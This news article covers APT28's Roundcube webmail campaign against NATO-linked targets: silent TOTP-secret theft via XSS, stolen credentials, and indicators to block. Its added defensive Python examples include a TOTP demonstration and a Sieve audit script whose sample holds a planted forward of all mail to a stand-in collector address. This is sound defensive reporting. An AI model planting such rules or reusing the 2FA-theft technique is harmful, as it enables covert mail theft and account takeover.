Fancy Bear Exposes Stolen Credentials, 2FA Secrets from NATO-Linked Targets
Key Takeaways
- Russian state-sponsored hacking group Fancy Bear (APT28) inadvertently exposed its operational server, revealing details of an extensive espionage campaign.
- The campaign targeted government and military organizations across Europe, including NATO member states and Ukraine, compromising credentials, 2FA secrets, and confidential communications.
- Fancy Bear employed a sophisticated JavaScript module to silently exfiltrate TOTP 2FA secrets from Roundcube webmail users, bypassing multi-factor authentication without user interaction.
- Affected organizations must immediately rotate TOTP secrets, audit email forwarding rules, block identified C2 infrastructure, and patch Roundcube for CVE-2023-43770.
Russian APT28 Exposes Espionage Campaign Targeting NATO-Linked Entities
A significant operational security lapse by Fancy Bear, a prominent hacking group linked to the Russian state, has offered cybersecurity researchers an unprecedented look into an active espionage operation. This campaign specifically targeted European government and military organizations, revealing extensive data exfiltration and sophisticated bypass techniques.
On March 11, 2026, threat intelligence firm Hunt.io disclosed its findings on a campaign it named “Operation Roundish.” This designation arose from an exposed open-directory first identified on January 13, 2026, which provided initial insights into Fancy Bear’s activities.
Fancy Bear, also known as APT28, Forest Blizzard, or Sednit, is widely recognized as Russia’s GRU Military Intelligence Unit 26165, according to assessments by the UK’s NCSC.
The targeted webmail exploitation effort had been underway for more than a year before the group's operational error left its server exposed to public scrutiny.
The exposure originated from a NameCheap Virtual Private Server (VPS) located in the United States, operating on the IP address 203.161.50.145.
Remarkably, this same server had been publicly linked to Fancy Bear by Ukraine's CERT-UA as early as September 2024. Despite that public attribution, the group continued to operate from the same infrastructure for more than 500 days without migrating to new systems.
Within the exposed directory, researchers discovered a trove of sensitive information, including 2,800 exfiltrated government and military emails, 240 sets of stolen credentials (comprising passwords and TOTP 2FA secrets), 140 unauthorized silent email-forwarding rules, and 11,500 contact addresses harvested from victim address books across multiple countries.
Analysts at Ctrl-Alt-Intel subsequently uncovered a second exposed open-directory on the identical server, which had not been included in Hunt.io’s initial January 2026 archive. This additional directory contained Fancy Bear’s complete command-and-control (C2) source code, supplementary JavaScript payloads, extensive campaign telemetry logs, and further exfiltrated data, collectively offering a nearly comprehensive overview of the entire operation.
Victims identified spanned Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. Email addresses associated with four NATO member states, including infrastructure belonging to NATO headquarters itself, were recovered directly from the stolen contact data.
The targeting pattern exhibited clear geopolitical motivations. Ukrainian regional prosecutors, likely involved in war crimes investigations, constituted the largest single victim group. Other compromised entities included Romania’s Air Force, Greece’s National Defence General Staff, Serbia’s Ministry of Defence, and various Bulgarian government organizations.
The strategic selection of targets is further underscored by recent geopolitical developments: Romania, Bulgaria, and Greece had formalized a military mobility agreement in July 2024, and Greece had participated in training Ukrainian F-16 pilots. These factors strongly suggest an intelligence-driven targeting strategy rather than opportunistic intrusions.
How Fancy Bear Silently Bypassed Two-Factor Authentication
One of the most concerning technical discoveries in this campaign was Fancy Bear’s sophisticated method for silently stealing TOTP-based 2FA secrets from victims who believed their accounts were fully protected. The group deployed a JavaScript module named keyTwoAuth.js, designed to execute entirely within the victim’s already authenticated Roundcube webmail session. This technique meant no additional clicks or separate login prompts were ever required from the target, making the compromise invisible to the user.
Upon activation of the XSS payload, keyTwoAuth.js initiated an HTTP request to Roundcube’s 2FA settings page specifically for the twofactorgauthenticator plugin. It then meticulously parsed the returned HTML, extracting five hidden password fields, which included one TOTP secret and four recovery codes. This data was subsequently Base64-encoded and quietly transmitted to Fancy Bear’s C2 server at zhblz.com, using the log prefix ktfu. With both the victim’s password and TOTP secret successfully acquired, Fancy Bear could generate valid authentication codes at any future time, thereby completely circumventing two-factor protection without requiring physical access to the victim’s device.
Ctrl-Alt-Intel recovered 516 log entries under the ktfu prefix, corresponding to 108 unique victim email addresses. Of these entries, 256 contained genuine stolen TOTP secrets, impacting targets within Romania's Air Force, Greece's GEETHA, Ukraine's Asset Recovery Agency, and Serbia's Ministry of Defence. The remaining 260 entries returned "nokey," indicating that those accounts had no 2FA configured at all and were protected by a password alone.
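The reason a stolen secret is so damaging is that TOTP is a pure function of the shared secret and the clock: anyone holding the secret computes exactly the code the server expects, forever, until the secret is replaced. The following added example (not code from the page, Hunt.io, or Ctrl-Alt-Intel) implements RFC 4226 HOTP and RFC 6238 TOTP with the standard library and runs a constructed scenario: an attacker who holds the exfiltrated base32 secret passes the server's check until rotation, after which the same secret produces codes the server rejects. The recovery-code format is this example's own choice, not the plugin's.

```python
"""Why a stolen TOTP secret defeats 2FA, and what rotation must replace.
Added example; not code from the page or the vendors it names."""
import base64
import hashlib
import hmac
import secrets
import struct

STEP = 30  # TOTP time step in seconds (RFC 6238 default)


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int, digits: int = 6) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / STEP)."""
    return hotp(secret, at // STEP, digits)


def verify(secret: bytes, code: str, at: int, window: int = 1) -> bool:
    """Server-side check tolerating +/- `window` steps of clock drift."""
    return any(hmac.compare_digest(totp(secret, at + k * STEP), code)
               for k in range(-window, window + 1))


def secret_from_base32(text: str) -> bytes:
    """Decode the base32 secret an authenticator app (or an exfiltrated hidden
    form field) carries; re-pad to a multiple of 8 chars as base32 requires."""
    clean = text.replace(" ", "").upper()
    return base64.b32decode(clean + "=" * (-len(clean) % 8))


def new_enrolment() -> dict:
    """Fresh TOTP secret plus four recovery codes. Rotation must replace both,
    since keyTwoAuth.js took one secret and four recovery codes per victim.
    The 8-hex-char recovery code format is an assumption of this example."""
    return {"secret_b32": base64.b32encode(secrets.token_bytes(20)).decode(),
            "recovery_codes": [secrets.token_hex(4) for _ in range(4)]}


def attacker_outcome(stolen_secret_b32: str, now: int, rotated: bool) -> bool:
    """Constructed scenario: the attacker holds the victim's password and the
    secret read from the Roundcube 2FA settings page. Before rotation the
    attacker's self-generated code passes; after rotation the server verifies
    against a different secret and the same code fails."""
    stolen = secret_from_base32(stolen_secret_b32)
    server_secret = (secret_from_base32(new_enrolment()["secret_b32"])
                     if rotated else stolen)
    attacker_code = totp(stolen, now)  # computed on the attacker's machine
    return verify(server_secret, attacker_code, now)


if __name__ == "__main__":
    victim_secret = new_enrolment()["secret_b32"]
    t = 1_700_000_000
    print("stolen secret, before rotation:", attacker_outcome(victim_secret, t, False))
    print("stolen secret, after rotation: ", attacker_outcome(victim_secret, t, True))
```

Note that rotation only helps if the new secret is enrolled on a device the attacker cannot read; re-enrolling through the same XSS-vulnerable webmail session before patching would simply hand the new secret over again.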
What You Should Do
- Rotate TOTP Secrets: All organizations utilizing Roundcube with the twofactorgauthenticator plugin should consider all existing TOTP secrets potentially compromised and initiate an immediate rotation.
- Audit Email Forwarding Rules: Administrators must thoroughly audit Sieve email-filtering rules for any unauthorized forwarding entries, especially those named "SystemProtect" or "SystemHealthChek."
- Block C2 Infrastructure: Immediately block all network connections to the identified C2 IP address 203.161.50.145 and the domain zhblz.com at your perimeter and internal network controls.
- Patch Roundcube: Apply the security patch for Roundcube CVE-2023-43770 without delay.
- Monitor Webmail Infrastructure: Enhance monitoring of webmail infrastructure for any signs of XSS injection or other anomalous activity.
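The forwarding-rule audit above is easy to do by hand for one mailbox and tedious for hundreds, so here is an added example (not code from the page or from Roundcube) that scans a managesieve script and reports redirect rules. It assumes the `# rule:[Name]` comment convention Roundcube's managesieve plugin writes before each rule, flags the two rule names the page reports, any redirect to a domain outside a trusted list (the trusted list is a placeholder you must fill in), and any unconditional `if true` forward. The sample script is constructed for the demonstration.

```python
"""Audit a Roundcube managesieve script for attacker-planted forwarding rules.
Added example; not code from the page, Roundcube, or the vendors named."""
import re
from dataclasses import dataclass, field

# Rule names the page reports Fancy Bear used; compared case-insensitively.
SUSPECT_RULE_NAMES = {"systemprotect", "systemhealthchek"}
# Domains your organisation legitimately forwards to. Placeholder: set yours.
TRUSTED_DOMAINS = {"example.gov"}

RULE_HDR = re.compile(r"^#\s*rule:\[(.*?)\]\s*$")
REDIRECT = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"')
UNCONDITIONAL = re.compile(r"\bif\s+true\b")


@dataclass
class Finding:
    rule: str
    target: str
    reasons: list = field(default_factory=list)


def audit_sieve(script: str) -> list:
    """Return one Finding per suspicious redirect in `script`."""
    findings = []
    current = "(unnamed)"
    body = []

    def flush():
        text = "\n".join(body)
        for target in REDIRECT.findall(text):
            reasons = []
            if current.lower() in SUSPECT_RULE_NAMES:
                reasons.append("known attacker rule name")
            domain = target.rsplit("@", 1)[-1].lower()
            if domain not in TRUSTED_DOMAINS:
                reasons.append(f"forwards to untrusted domain {domain}")
            if UNCONDITIONAL.search(text):
                reasons.append("unconditional (if true): forwards every message")
            if reasons:
                findings.append(Finding(current, target, reasons))

    for line in script.splitlines():
        m = RULE_HDR.match(line.strip())
        if m:
            flush()                      # close the previous rule
            current, body = m.group(1), []
        else:
            body.append(line)
    flush()                              # close the last rule
    return findings


# Constructed sample: one benign filter, one planted silent forward,
# one legitimate internal forward.
SAMPLE_SCRIPT = """\
require ["fileinto","copy"];
# rule:[Archive newsletters]
if header :contains "subject" "newsletter"
{
\tfileinto "Newsletters";
}
# rule:[SystemProtect]
if true
{
\tredirect :copy "collector@mail-relay.example";
}
# rule:[Backup copy]
if header :contains "from" "hr@example.gov"
{
\tredirect :copy "hr-archive@example.gov";
}
"""

if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SCRIPT):
        print(f"[{f.rule}] -> {f.target}: " + "; ".join(f.reasons))
```

Run it over each user's active script as dumped from your Sieve server (for Dovecot, the file under the user's sieve directory); a hit on the untrusted-domain check alone is worth a look even when the rule name is innocuous, since the names reported here were chosen to blend in and can be changed at will.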
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.